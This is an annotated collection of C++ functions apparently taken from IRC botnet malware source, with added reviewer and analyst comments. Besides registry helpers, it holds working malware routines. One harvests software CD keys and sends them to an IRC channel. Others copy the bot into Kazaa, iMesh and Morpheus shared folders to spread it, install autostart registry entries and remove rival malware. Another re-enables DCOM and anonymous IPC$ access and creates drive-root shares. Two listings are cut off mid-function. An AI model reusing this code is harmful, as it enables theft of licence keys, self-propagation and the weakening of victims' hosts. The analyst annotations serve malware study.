예제 #1
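// Read a string-like registry value and return it as a C string.
//
// root/subkey identify the key and name the value (NULL selects the key's
// default value). When type is REG_MULTI_SZ the NUL separators between the
// individual strings are replaced by '\n' so the result is one printable string.
//
// Returns a pointer to a function-static buffer, or NULL when the key cannot be
// opened or the value cannot be read. The buffer is overwritten by the next
// call and shared by every caller, so the result must be copied if it has to
// outlive the next RegQuery call; the function is not safe to call from
// several threads at once.
char *RegQuery(HKEY root,LPCTSTR subkey,LPCTSTR name,DWORD type/*=REG_SZ*/)
{
	// Two spare bytes beyond the 65535 offered to the API, so the data can
	// always be NUL-terminated in place.
	static char szRegBuffer[65535+2];
	HKEY key=NULL;
	DWORD dwRes=65535;

	// Clear the whole buffer, spare bytes included, so nothing from a
	// previous call can leak into this result.
	ZeroMemory(szRegBuffer,sizeof(szRegBuffer));

	// Reading a value needs read access only. Asking for KEY_ALL_ACCESS makes
	// the open fail on keys the caller may read but not modify.
	if (fRegOpenKeyEx(root,subkey,0,KEY_READ,&key) != ERROR_SUCCESS)
		return NULL;

	LONG lRet=fRegQueryValueEx(key,name,NULL,NULL,(unsigned char *)szRegBuffer,&dwRes);
	fRegCloseKey(key);	// single close for both outcomes
	if (lRet != ERROR_SUCCESS)
		return NULL;

	// The registry does not guarantee that stored strings carry a terminator,
	// and dwRes is API output: clamp it before using it as an index.
	if (dwRes > 65535)
		dwRes=65535;
	szRegBuffer[dwRes]='\0';

	if (type==REG_MULTI_SZ)
	{
		// Step back over the trailing NULs so they are not turned into newlines
		while (dwRes != 0 && szRegBuffer[dwRes]=='\0')
			--dwRes;

		// Remaining NULs are separators between strings: convert to \n
		for (DWORD i=0; i<dwRes; ++i)
		{
			if (szRegBuffer[i]=='\0')
				szRegBuffer[i]='\n';
		}
	}
	return szRegBuffer;
}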
예제 #2
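// Report whether the value `name` can be read under root\subkey.
//
// type selects which RegQuery overload performs the probe: REG_DWORD uses the
// DWORD reader, REG_SZ / REG_EXPAND_SZ / REG_MULTI_SZ use the string reader.
// Any other type, a NULL subkey or a NULL name yields FALSE.
BOOL RegExists(HKEY root,LPCTSTR subkey,char *name,DWORD type)
{
	HKEY key=NULL;
	BOOL bRet=FALSE;

	if (!subkey || !name)
		return FALSE;

	// An existence check never writes, so request read access only. With
	// KEY_WRITE in the mask the probe reported "missing" for every key the
	// caller could read but not modify.
	if (fRegOpenKeyEx(root,subkey,0,KEY_READ,&key) != ERROR_SUCCESS)
		return FALSE;

	if (type==REG_DWORD)
	{
		BOOL success=FALSE;
		// Only the success flag matters here; the value itself is discarded.
		(void)RegQuery(root,subkey,name,&success);
		bRet = success ? TRUE : FALSE;
	}
	else if (type==REG_SZ || type==REG_EXPAND_SZ || type==REG_MULTI_SZ)
	{
		// The string reader returns NULL when the value cannot be read.
		bRet = (RegQuery(root,subkey,name,REG_SZ) != NULL) ? TRUE : FALSE;
	}

	fRegCloseKey(key);
	return bRet;
}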
예제 #3
// Walks the `viruses` table (defined elsewhere; the loop stops at the first
// entry whose subkey is NULL). For every entry whose registry value can be
// read, it calls the value-delete API on that value and then DeleteFile on
// <system directory>\<entry file>.
//
// Analyst note: the effects visible from this listing are one registry value
// deletion attempt and one file deletion attempt per matching table entry.
// Which keys and files those are depends on the table, which is not shown.
void removevirus()
{
	char sysdir[MAX_PATH], virusexecuteble[MAX_PATH];
	unsigned char szDataBuf[128];

	HKEY hkey;
	LONG lRet;
	// In/out size for the query below. NOTE(review): it is set once, outside
	// the loop, so after the first successful query it holds the size of the
	// previous value rather than the buffer capacity.
	DWORD dwSize = 128;

	for (unsigned int i=0; viruses[i].subkey; i++) {
		// NOTE(review): lRet is never tested. When the open fails, the query
		// and the close below run on an hkey that was never initialised.
		lRet = fRegOpenKeyEx(viruses[i].hkey, viruses[i].subkey, 0, KEY_READ, &hkey);
		if(fRegQueryValueEx(hkey, viruses[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) {

				// NOTE(review): the handle was opened with KEY_READ only and
				// the result of this call is ignored, so a failed delete
				// goes unnoticed.
				fRegDeleteValue(hkey, viruses[i].value);
				//FIXME: Replace the afw kill utils. we dont need to let that loop,
				//		 when we removed the .exe and the reg key. mayb a static call
				//		 to KillProcess(); can be inserted here. Something like:
				// KillProcess(viruses[i].file);
				GetSystemDirectory(sysdir, sizeof(sysdir));
				// NOTE(review): unbounded sprintf into a MAX_PATH buffer; the
				// combined length of sysdir and the table's file name is not checked.
				sprintf(virusexecuteble, "%s\\%s", sysdir, viruses[i].file);
				DeleteFile(virusexecuteble);

		}
		fRegCloseKey(hkey);
	}

	return;
}
예제 #4
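// Read a REG_DWORD value from root\subkey.
//
// On success sets `success` to TRUE and returns the value. On any failure
// (key cannot be opened, value missing, value is not a 4-byte REG_DWORD)
// sets `success` to FALSE and returns 0, so a stored 0 and a failure can only
// be told apart through `success`.
DWORD RegQuery(HKEY root,LPCTSTR subkey,LPCTSTR name,BOOL &success)
{
	HKEY key=NULL;
	DWORD dwType=0,dwSize=sizeof(DWORD),dwRead=0;

	success=FALSE;

	// Reading needs read access only; KEY_ALL_ACCESS fails on keys the caller
	// may read but not modify.
	if (fRegOpenKeyEx(root,subkey,0,KEY_READ,&key) != ERROR_SUCCESS)
		return 0;

	LONG lRet=fRegQueryValueEx(key,name,NULL,&dwType,(LPBYTE)&dwRead,&dwSize);
	fRegCloseKey(key);

	// dwType is an output of the query, not a filter: without this check any
	// value of four bytes or fewer (a short string, a small binary blob) would
	// be returned as if it were a number.
	if (lRet != ERROR_SUCCESS || dwType != REG_DWORD || dwSize != sizeof(DWORD))
		return 0;

	success=TRUE;
	return dwRead;
}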
예제 #5
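// Delete a registry value or a whole key.
//
// name != NULL: delete the value `name` under root\subkey.
// name == NULL: delete the key root\subkey itself, removing its subkeys first
//               when the direct delete is refused.
// Returns TRUE when the requested item was deleted, FALSE otherwise (including
// a NULL subkey, or an empty subkey when a key deletion is requested).
BOOL RegDelete(HKEY root,LPCTSTR subkey,LPCTSTR name)
{
	HKEY key=NULL;
	if (!subkey)
		return FALSE;

	if (name)
	{
		if (fRegOpenKeyEx(root,subkey,0,KEY_READ|KEY_WRITE,&key) != ERROR_SUCCESS)
			return FALSE;

		BOOL bDeleted = (fRegDeleteValue(key,name) == ERROR_SUCCESS) ? TRUE : FALSE;
		fRegCloseKey(key);
		return bDeleted;
	}

	// An empty subkey would open `root` itself and empty it; refuse that.
	if (!*subkey)
		return FALSE;

	// Fast path: succeeds when the key has no subkeys.
	if (fRegDeleteKey(root,subkey) == ERROR_SUCCESS)
		return TRUE;

	if (fRegOpenKeyEx(root,subkey,0,KEY_READ|KEY_WRITE,&key) != ERROR_SUCCESS)
		return FALSE;

	// Remove the children one by one. Index 0 is used every time because each
	// successful delete shifts the remaining subkeys down; advancing the index
	// would skip entries. The name-length argument is in/out and must be reset
	// before every call.
	for (;;)
	{
		char buf[256] = {0};
		DWORD chr = sizeof(buf);
		FILETIME ftm;

		if (fRegEnumKeyEx(key,0,buf,&chr,NULL,NULL,NULL,&ftm) != ERROR_SUCCESS)
			break;	// ERROR_NO_MORE_ITEMS or a real error: stop either way

		// Recurse relative to the opened key. Stop on failure, otherwise the
		// same undeletable child would be enumerated forever.
		if (!RegDelete(key,buf,NULL))
			break;
	}

	// Close before the final delete; the handle was leaked previously.
	fRegCloseKey(key);

	return (fRegDeleteKey(root,subkey) == ERROR_SUCCESS) ? TRUE : FALSE;
}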
예제 #6
// Reads the "DownloadsLocation" value from HKLM\SOFTWARE\iMesh\Client and, if
// the read succeeds, calls CopyFile with `botfile` as the source and the value
// that was read as the destination.
//
// Analyst note: the artifacts visible here are a read of that registry value
// and a file copy into the location it names, i.e. into a file-sharing
// client's download directory.
void iMeshInit(char *botfile)
{
	char buffer[MAX_PATH];

	HKEY hkey = NULL;
	// Size offered to the query; smaller than the MAX_PATH buffer it describes.
	DWORD dwSize = 128;

	// NOTE(review): the open result is ignored; on failure the query and the
	// close below run with hkey still NULL.
	fRegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\iMesh\\Client", 0, KEY_READ, &hkey);
	if(fRegQueryValueEx(hkey, "DownloadsLocation", NULL, NULL, (unsigned char*)buffer, &dwSize) == ERROR_SUCCESS) {
		// FALSE = overwrite an existing destination file.
		CopyFile(botfile, buffer, FALSE);
	}
	fRegCloseKey(hkey);

	return;
}
예제 #7
// For every entry of the `autostart` table (defined elsewhere), creates or
// opens the entry's registry key and then either writes the value `valuename`
// (a global defined elsewhere) as a REG_SZ holding `nfilename`, or, when
// nfilename is NULL, deletes that value.
//
// Analyst note: this is the install/uninstall routine for the sample's
// registry autostart entries. The keys themselves are not visible in this
// listing; writes and deletes of a single fixed value name across several
// autostart keys are the pattern to look for in registry auditing.
void AutoStartRegs(char *nfilename)
{
	HKEY key;

	for (int i=0; i < (sizeof(autostart) / sizeof(AUTOSTART)); i++) {
		// NOTE(review): the result is not checked; if the create fails, `key`
		// is uninitialised on the first pass or stale (already closed) afterwards.
		fRegCreateKeyEx(autostart[i].hkey, autostart[i].subkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL); 
		if (nfilename)
			// NOTE(review): the size passed is strlen() without the terminating NUL.
			fRegSetValueEx(key, valuename, 0, REG_SZ, (const unsigned char *)nfilename, strlen(nfilename));
		else
			fRegDeleteValue(key, valuename); 
		fRegCloseKey(key); 
	}
   
	return;
}
예제 #8
// Reads the "Dir0" value from HKCU\SOFTWARE\KAZAA\LocalContent, removes the
// literal "012345:" from it with replacestr() (defined elsewhere), and calls
// CopyFile with `botfile` as the source and the resulting string as the
// destination.
//
// Analyst note: the artifacts visible here are a read of that registry value
// and a file copy into the path it names, i.e. into a file-sharing client's
// shared-content directory.
void KazaaInit(char *botfile)
{
	char buffer[MAX_PATH];

	// NOTE(review): hkey is uninitialised and the open result below is not
	// checked, so a failed open leads to a query and close on garbage.
	HKEY hkey;
	// Size offered to the query; smaller than the MAX_PATH buffer it describes.
	DWORD dwSize = 128;

	fRegOpenKeyEx(HKEY_CURRENT_USER, "SOFTWARE\\KAZAA\\LocalContent", 0, KEY_READ, &hkey);
	if(fRegQueryValueEx(hkey, "Dir0", NULL, NULL, (unsigned char*)buffer, &dwSize) == ERROR_SUCCESS) {
		replacestr(buffer, "012345:", "");
		// FALSE = overwrite an existing destination file.
		CopyFile(botfile, buffer, FALSE);
	}
	fRegCloseKey(hkey);

	return;
}
예제 #9
// Reads the "Install_Dir" value from HKLM\SOFTWARE\Morpheus, appends
// "\My Shared Folder" to it, creates that directory, and calls CopyFile with
// `botfile` as the source and the directory string as the destination.
//
// Analyst note: the artifacts visible here are a read of that registry value,
// a CreateDirectory call and a file copy aimed at a file-sharing client's
// shared folder.
void MorpheusInit(char *botfile)
{
	char buffer[MAX_PATH];

	// NOTE(review): hkey is uninitialised and the open result below is not
	// checked, so a failed open leads to a query and close on garbage.
	HKEY hkey;
	// Size offered to the query; smaller than the MAX_PATH buffer it describes.
	DWORD dwSize = 128;

	fRegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Morpheus", 0, KEY_READ, &hkey);
	if(fRegQueryValueEx(hkey, "Install_Dir", NULL, NULL, (unsigned char*)buffer, &dwSize) == ERROR_SUCCESS) {
		// NOTE(review): `buffer` is both the destination and a source
		// argument of the same formatted write; overlapping source and
		// destination is undefined behaviour for the printf family.
		_snprintf(buffer, sizeof(buffer), "%s\\My Shared Folder", buffer);
		CreateDirectory(buffer, 0);
		// FALSE = overwrite an existing destination file.
		CopyFile(botfile, buffer, FALSE);
	}
	fRegCloseKey(hkey);

	return;
}
예제 #10
// Walks the `regkeys` table (defined elsewhere; the loop stops at the first
// entry whose subkey is NULL) and reports product keys found on the host.
// For each entry whose registry value can be read:
//   - if the entry has a `file`, the registry data is used as a directory,
//     the file is opened there and one line of it is reported;
//   - otherwise the registry data itself is reported.
// Every report is formatted into sendbuf, sent with irc_privmsg() to `chan`
// over `sock`, and passed to addlog().
//
// Analyst note: this is a data-theft routine. The visible artifacts are
// registry reads of licence-key values, reads of small files next to installed
// software, and outbound IRC messages containing the text " CD Key: (".
void getcdkeys(SOCKET sock, char *chan, BOOL notice)
{
	char sendbuf[IRCLINE], line[100], szPath[MAX_PATH];
	unsigned char szDataBuf[128];

	FILE *fp;
	HKEY hkey;
	LONG lRet;
	// In/out size for the query below. NOTE(review): set once, outside the
	// loop, so later iterations start from the size of the previous value.
	DWORD dwSize = 128;

	for (unsigned int i=0; regkeys[i].subkey; i++) {
		// NOTE(review): lRet is never tested; a failed open still reaches the
		// query and the close with an hkey that was never initialised.
		lRet = fRegOpenKeyEx(regkeys[i].hkey, regkeys[i].subkey, 0, KEY_READ, &hkey);
		if(fRegQueryValueEx(hkey, regkeys[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) {
			if (regkeys[i].file) {
				// Registry data is treated as a directory path here.
				// NOTE(review): unbounded sprintf; szDataBuf is also not
				// guaranteed to be NUL-terminated by the registry API.
				sprintf(szPath, "%s\\%s", szDataBuf, regkeys[i].file);
				if((fp=fopen(szPath,"r"))!=NULL) {
					while(fgets(line,sizeof(line),fp)) {
						// Acts on the first line that does NOT contain the tag.
						if(!strstr(line, regkeys[i].tag)) {
							if (strchr(regkeys[i].tag,'=')) {
								// Report the text after the first '=' on the line.
								// NOTE(review): the second strtok() returns NULL
								// when the line has nothing after '=', and that
								// NULL is passed to %s.
								strtok(line,"=");
								sprintf(sendbuf, "4<<12%s CD Key: (%s).4>> ",regkeys[i].name,strtok(NULL, "="));
							} else
								sprintf(sendbuf, "4<<12%s CD Key: (%s).4>> ",regkeys[i].name,line);
							irc_privmsg(sock,chan,sendbuf,notice);
							addlog(sendbuf);
							break;
						}
					}
					fclose(fp);
				}
			} else {
				// Registry data is the key itself.
				sprintf(sendbuf, "4<<12%s CD Key: (%s).4>> ",regkeys[i].name,szDataBuf);
				irc_privmsg(sock,chan,sendbuf,notice);
				addlog(sendbuf);
			}
		}
		fRegCloseKey(hkey);
	}

	return;
}
예제 #11
// Variant of removevirus() that also tries to stop the matching process.
// Walks the `viruses` table (defined elsewhere; the loop stops at the first
// entry whose subkey is NULL). For every entry whose registry value can be
// read, it calls the value-delete API on that value, passes the entry's file
// name to listProcesses() (defined elsewhere), and calls DeleteFile on
// <system directory>\<entry file>.
//
// Analyst note: status strings are formatted into sendbuf but nothing in this
// function sends or logs them, so from this listing the only visible effects
// are the registry, process and file operations.
void removevirus()
{
	char sysdir[MAX_PATH], virusexecuteble[MAX_PATH];
	unsigned char szDataBuf[128]; 
	SOCKET sock;
	HKEY hkey;
	char sendbuf[IRCLINE];
	char current[20];
	LONG lRet;
	// NOTE(review): the socket is created, handed to listProcesses() and
	// never connected or closed in this function.
	sock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
	// In/out size for the query below. NOTE(review): set once, outside the
	// loop, so later iterations start from the size of the previous value.
	DWORD dwSize = 128;

	for (unsigned int i=0; viruses[i].subkey; i++) {
		// NOTE(review): lRet is never tested; a failed open still reaches the
		// query and the close with an hkey that was never initialised.
		lRet = fRegOpenKeyEx(viruses[i].hkey, viruses[i].subkey, 0, KEY_READ, &hkey);
		if(fRegQueryValueEx(hkey, viruses[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) {
			
				// NOTE(review): handle opened with KEY_READ only, result ignored.
				fRegDeleteValue(hkey, viruses[i].value);
				// NOTE(review): unbounded copy into a 20-byte buffer; safe
				// only if every table file name is shorter than 20 characters.
				strcpy(current,viruses[i].file);
				//FIXME: Replace the afw kill utils. we dont need to let that loop,
				//		 when we removed the .exe and the reg key. mayb a static call
				//		 to KillProcess(); can be inserted here. Something like:
				if(listProcesses(sock,NULL,FALSE,current) == 1)
					sprintf(sendbuf,"[PROC]: Process killed: %s",viruses[i].file);
				else
					sprintf(sendbuf,"[PROC]: Failed to terminate process: %s", viruses[i].file);
				//KillProcess(viruses[i].file);
				GetSystemDirectory(sysdir, sizeof(sysdir));
				// NOTE(review): unbounded sprintf into a MAX_PATH buffer.
				sprintf(virusexecuteble, "%s\\%s", sysdir, viruses[i].file);
				DeleteFile(virusexecuteble);
			
		}
		fRegCloseKey(hkey);
		
	}
	sprintf(sendbuf,"[AV]: Antivirus search complete! ");
	return;
}
예제 #12
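// Locate the Firefox installation directory from the registry.
//
// Reads the default value of
//   HKLM\SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
// (the browser's launch command), strips a leading double quote and cuts the
// string at its last backslash so that only the directory remains.
//
// Returns a malloc()ed string the caller must free(), or NULL when the key or
// value cannot be read, the value is not a string, it is empty, or the
// allocation fails.
char *GetFirefoxLibPath()
{
	char regSubKey[]    = "SOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command";
	// One byte more than is offered to the API, so the data can always be
	// terminated in place: registry strings may be stored without a NUL.
	char path[_MAX_PATH + 1] = "";
	DWORD pathSize = _MAX_PATH;
	DWORD valueType = 0;
	HKEY rkey;

	// Open the Firefox launch-command key
	if( fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regSubKey, 0, KEY_READ, &rkey) != ERROR_SUCCESS )
		return NULL;

	// Read the key's default value, then release the handle on every path
	LONG lRet = fRegQueryValueEx(rkey, NULL, 0, &valueType, (unsigned char *)path, &pathSize);
	fRegCloseKey(rkey);

	if( lRet != ERROR_SUCCESS )
		return NULL;

	// Only string data can be parsed as a path.
	if( valueType != REG_SZ && valueType != REG_EXPAND_SZ )
		return NULL;

	// pathSize is API output; bound it before using it as an index.
	if( pathSize == 0 || pathSize > _MAX_PATH )
		return NULL;
	path[pathSize] = '\0';

	if( path[0] == '\0' )
		return NULL;

	// Drop a leading double quote. strlen(path) bytes starting at path+1
	// include the terminator, so the string is shifted as a whole.
	if( path[0] == '\"' )
		memmove(path, path + 1, strlen(path));

	// Cut at the last backslash to keep the directory only. A backslash at
	// index 0 is left alone, as before.
	char *lastSep = strrchr(path, '\\');
	if( lastSep && lastSep != path )
		*lastSep = '\0';

	size_t len = strlen(path) + 1;
	char *firefoxPath = (char*) malloc(len);
	if( firefoxPath )
		memcpy(firefoxPath, path, len);

	return firefoxPath;
}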
예제 #13
// Changes host configuration in three steps and reports each result:
//   1. sets the REG_SZ value "EnableDCOM" to "N" under the HKLM key named by
//      regkey3,
//   2. sets the REG_DWORD value "restrictanonymous" to 1 under the HKLM key
//      named by regkey4,
//   3. enumerates network shares and deletes every share whose name ends in
//      '$'; if enumeration fails, deletes the shares listed in ShareList.
// regkey3, regkey4, ShareList, ShareDel and the f*-prefixed API pointers are
// defined elsewhere. Each status line goes to addlog() and, unless `silent`,
// to `chan` via irc_privmsg(). Always returns TRUE.
//
// Analyst note: in a bot these changes close the services other malware uses
// to get in; they do not remove the bot itself. On an affected host the
// traces are the two registry writes and the removal of the administrative
// ('$') shares. EnableDCOM normally lives under HKLM\SOFTWARE\Microsoft\Ole
// and restrictanonymous under HKLM\SYSTEM\CurrentControlSet\Control\Lsa --
// presumably what regkey3/regkey4 hold; confirm against their definitions.
BOOL SecureSystem(SOCKET sock, char *chan, BOOL notice, BOOL silent)
{
	char sendbuf[IRCLINE];

	// noadvapi32 is set elsewhere; when non-zero the registry steps are skipped.
	if (!noadvapi32) {
		HKEY hKey;
		if(fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey3, 0, KEY_READ|KEY_WRITE, &hKey) == ERROR_SUCCESS) {
			TCHAR szDataBuf[]="N";
			// NOTE(review): NULL is passed for the DWORD Reserved argument,
			// and the size is strlen() without the terminating NUL.
			if(fRegSetValueEx(hKey, "EnableDCOM", NULL, REG_SZ, (LPBYTE)szDataBuf, strlen(szDataBuf)) != ERROR_SUCCESS)
				sprintf(sendbuf,"4<<12[SECURE]: Disable DCOM failed.4>>");
			else
				sprintf(sendbuf,"4<<12[SECURE]: DCOM disabled.4>>");
			fRegCloseKey(hKey);
		} else
			sprintf(sendbuf,"4<<12[SECURE]: Failed to open DCOM registry key.4>>");
		if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
		addlog(sendbuf);

		if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {
			DWORD dwData = 0x00000001;
			if (fRegSetValueEx(hKey, "restrictanonymous", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS)
				sprintf(sendbuf,"4<<12[SECURE]: Failed to restrict access to the IPC$ Share.4>>");
			else
				sprintf(sendbuf,"4<<12[SECURE]: Restricted access to the IPC$ Share.4>>");
			fRegCloseKey(hKey);
		} else
			sprintf(sendbuf,"4<<12[SECURE]: Failed to open IPC$ Restriction registry key.4>>");
	} else
		sprintf(sendbuf,"4<<12[SECURE]: Advapi32.dll couldn't be loaded.4>>");
	// Reports the restrictanonymous result, or the Advapi32 failure.
	if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
	addlog(sendbuf);

	// nonetapi32 is set elsewhere; when non-zero the share step is skipped.
	if (!nonetapi32) {
		PSHARE_INFO_502 pBuf,p;
		NET_API_STATUS nStatus;
		DWORD entriesread=0,totalread=0,resume=0;

		// Level-502 enumeration, repeated while the API reports more data.
		do {
			nStatus = fNetShareEnum(NULL, 502, (LPBYTE *) &pBuf, -1, &entriesread, &totalread, &resume);

			if(nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA) {
				p = pBuf;

				for(unsigned int i=1;i <= entriesread;i++) {
					// Only shares whose name ends in '$' are deleted.
					// NOTE(review): an empty share name would index at -1 here.
					if (p->shi502_netname[wcslen(p->shi502_netname)-1] == '$') {
						if(ShareDel(NULL,AsAnsiString(p->shi502_netname)) == NERR_Success)
							_snprintf(sendbuf,sizeof(sendbuf),"nzm (secure.plg) »»  Share '%S' deleted.",p->shi502_netname);
						else
							_snprintf(sendbuf,sizeof(sendbuf),"nzm (secure.plg) »»  Failed to delete '%S' share.",p->shi502_netname);
						if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
						addlog(sendbuf);
					}

					p++;
				}

				fNetApiBufferFree(pBuf);
			} else {
				// Enumeration failed: fall back to the fixed ShareList table.
				// NOTE(review): '%S' expects a wide string in a narrow
				// printf; whether ShareName is wide is not visible here -- confirm.
				for(int i=0;i < (sizeof(ShareList) / sizeof (NetShares));i++) {
					if(ShareDel(NULL,ShareList[i].ShareName) == NERR_Success)
						_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Share '%S' deleted.4>>",ShareList[i].ShareName);
					else
						_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Failed to delete '%S' share.4>>",ShareList[i].ShareName);
					if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
					addlog(sendbuf);
				}
			}
		} while (nStatus == ERROR_MORE_DATA);
		sprintf(sendbuf,"4<<12[SECURE]: Network shares deleted.4>>");
	} else
		sprintf(sendbuf,"4<<12[SECURE]: Netapi32.dll couldn't be loaded.4>>");
	if (!silent) irc_privmsg(sock,chan, sendbuf, notice);
	addlog(sendbuf);

	return TRUE;
}
예제 #14
// Counterpart of SecureSystem: reverts the same settings and reports each
// result. It
//   1. sets the REG_SZ value "EnableDCOM" to "Y" under the HKLM key named by
//      regkey3,
//   2. sets the REG_DWORD value "restrictanonymous" to 0 under the HKLM key
//      named by regkey4,
//   3. re-adds the shares from ShareList (all but its last two entries) and
//      adds an "<letter>$" share for the root of every fixed drive except A.
// regkey3, regkey4, ShareList, ShareAdd and the f*-prefixed API pointers are
// defined elsewhere. Each status line goes to addlog() and, unless `silent`,
// to `chan` via irc_privmsg().
//
// Analyst note: every step here weakens the host's configuration. Re-enabled
// DCOM, restrictanonymous reset to 0 and newly created drive-root shares are
// the traces to look for.
//
// NOTE: this listing is truncated after the final `else`; the remainder of the
// function is not shown on the page.
BOOL UnSecureSystem(SOCKET sock, char *chan, BOOL notice, BOOL silent)
{
	char sendbuf[IRCLINE];

	// noadvapi32 is set elsewhere; when non-zero the registry steps are skipped.
	if (!noadvapi32) {
		HKEY hKey;
		if(fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey3, 0, KEY_READ|KEY_WRITE, &hKey) == ERROR_SUCCESS) {
			TCHAR szDataBuf[]="Y";
			// NOTE(review): NULL is passed for the DWORD Reserved argument,
			// and the size is strlen() without the terminating NUL.
			if(fRegSetValueEx(hKey, "EnableDCOM", NULL, REG_SZ, (LPBYTE)szDataBuf, strlen(szDataBuf)) != ERROR_SUCCESS)
				sprintf(sendbuf,"4<<12[SECURE]: Enable DCOM failed.4>>");
			else
				sprintf(sendbuf,"4<<12[SECURE]: DCOM enabled.4>>");
			fRegCloseKey(hKey);
		} else
			sprintf(sendbuf,"4<<12[SECURE]: Failed to open DCOM registry key.4>>");
		if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
		addlog(sendbuf);

		if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {
			DWORD dwData = 0x00000000;
			if (fRegSetValueEx(hKey, "restrictanonymous", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS)
				sprintf(sendbuf,"4<<12[SECURE]: Failed to unrestrict access to the IPC$ Share.4>>");
			else
				sprintf(sendbuf,"4<<12[SECURE]: Unrestricted access to the IPC$ Share.4>>");
			fRegCloseKey(hKey);
		} else
			sprintf(sendbuf,"4<<12[SECURE]: Failed to open IPC$ restriction registry key.4>>");
	} else
		sprintf(sendbuf,"4<<12[SECURE]: Advapi32.dll couldn't be loaded.4>>");
	// Reports the restrictanonymous result, or the Advapi32 failure.
	if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
	addlog(sendbuf);

	// nonetapi32 is set elsewhere; when non-zero the share step is skipped.
	if (!nonetapi32) {
		// The last two ShareList entries are skipped by the "- 2"; why is not
		// visible from this listing.
		for(int i=0;i < ((sizeof(ShareList) / sizeof (NetShares)) - 2);i++) {
			if(ShareAdd(NULL,ShareList[i].ShareName,ShareList[i].SharePath) == NERR_Success)
				_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Share '%s' added.4>>",ShareList[i].ShareName);
			else
				_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Failed to add '%s' share.4>>",ShareList[i].ShareName);
			if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
			addlog(sendbuf);
		}

		char sharename[10], sharepath[10];
		// Bit n of the mask stands for drive letter 'A'+n; the loop shifts the
		// mask right while advancing the letter.
		DWORD dwDrives = GetLogicalDrives();
		for(char cDrive='A'; dwDrives!=0; cDrive++, dwDrives=(dwDrives>>1)) {
			if((dwDrives & 1)==1 && cDrive != 'A') {
				_snprintf(sharename,sizeof(sharename),"%c$",cDrive);
				_snprintf(sharepath,sizeof(sharepath),"%c:\\",cDrive);

				// Only fixed drives get a share.
				if (fGetDriveType(sharepath) == DRIVE_FIXED) {
					if(ShareAdd(NULL,sharename,sharepath) == NERR_Success)
						_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Share '%s' added.4>>",sharename);
					else
						_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Failed to add '%s' share.4>>",sharename);
					if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
					addlog(sendbuf);
				}
			}
		}

		sprintf(sendbuf,"4<<12[SECURE]: Network shares added.4>>");
	} else
예제 #15
파일: secure.cpp 프로젝트: hazcod/botnets
// Changes host configuration in several steps and reports each result:
//   1. sets the REG_SZ value "EnableDCOM" to "N" under the HKLM key named by
//      regkey3,
//   2. sets the REG_DWORD values "restrictanonymous" and
//      "restrictanonymoussam" to 1 under the HKLM key named by regkey4,
//   3. unless NO_LSARESTRICT is defined, calls SearchForPrivilegedAccounts()
//      for "SeNetworkLogonRight" and reports how many accounts it changed,
//   4. unless NO_NET is defined, enumerates network shares and deletes every
//      share whose name ends in '$'; if enumeration fails, deletes the shares
//      listed in ShareList.
// regkey3, regkey4, ShareList, ShareDel, SearchForPrivilegedAccounts and the
// f*-prefixed API pointers are defined elsewhere. Each status line goes to
// addlog() and, unless `silent`, to `chan` via irc_privmsg(). Always returns
// TRUE.
//
// Analyst note: in a bot these changes close the services other malware uses
// to get in; they do not remove the bot itself. On an affected host the
// traces are the three registry writes, the local-policy change and the
// removal of the administrative ('$') shares.
BOOL SecureSystem(SOCKET sock, char *chan, BOOL notice, BOOL silent)
{
	char sendbuf[IRCLINE];

	// noadvapi32 is set elsewhere; when non-zero the registry steps are skipped.
	if (!noadvapi32) {
		HKEY hKey; 
		if(fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey3, 0, KEY_READ|KEY_WRITE, &hKey) == ERROR_SUCCESS) {
			TCHAR szDataBuf[]="N"; 
			// NOTE(review): NULL is passed for the DWORD Reserved argument,
			// and the size is strlen() without the terminating NUL.
			if(fRegSetValueEx(hKey, "EnableDCOM", NULL, REG_SZ, (LPBYTE)szDataBuf, strlen(szDataBuf)) != ERROR_SUCCESS)
				sprintf(sendbuf,"[SECURE]: Disable DCOM failed.");
			else
				sprintf(sendbuf,"[SECURE]: DCOM disabled.");
			fRegCloseKey(hKey);
		} else
			sprintf(sendbuf,"[SECURE]: Failed to open DCOM registry key.");
		if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
		addlog(sendbuf);

		if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {
			DWORD dwData = 0x00000001;
